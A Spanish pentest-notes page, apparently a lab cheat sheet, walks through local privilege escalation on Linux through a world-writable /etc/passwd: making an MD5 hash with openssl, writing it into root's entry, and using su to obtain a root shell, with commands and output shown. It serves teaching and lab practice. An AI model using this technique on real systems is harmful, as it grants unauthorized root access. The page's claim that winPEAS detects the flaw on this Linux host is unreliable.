⚪ /etc/passwd (Writable)

Cuando un usuario dispone de permisos para escribir en el archivo /etc/passwd, un atacante puede sustituir :x: en la línea del usuario root por un hash :$1$TSMXnd0L$DwQWYa.zuPqtZUjyRLWxy0:, esto cambia el comportamiento de la validación de credenciales y se realizará desde el archivo /etc/passwd en lugar de /etc/shadow.

Permisos

Manual

low@vulnyx:~$ ls -l /etc/passwd
-rw----rw- 1 root root 1395 abr 21 20:16 /etc/passwd

Automático

winPEAS

Si se enumera el sistema con winPEAS lo detectará de forma automática.

Hash

Crear

root@kali:~# openssl passwd -1 "P@ssword123"
$1$TSMXnd0L$DwQWYa.zuPqtZUjyRLWxy0

Agregar

# antes
low@vulnyx:~$ cat /etc/passwd |grep root
root:x:0:0:root:/root:/bin/bash
# después
low@vulnyx:~$ cat /etc/passwd |grep root
root:$1$TSMXnd0L$DwQWYa.zuPqtZUjyRLWxy0:0:0:root:/root:/bin/bash

Autenticar

low@vulnyx:~$ su -
Password:
root@vulnyx:~# id
uid=0(root) gid=0(root) grupos=0(root)

⚪ /etc/passwd (Writable)

⚪ /etc/passwd (Writable)

Permisos

Manual

Automático

winPEAS

Hash

Crear

Agregar

Autenticar

results matching ""

No results matching ""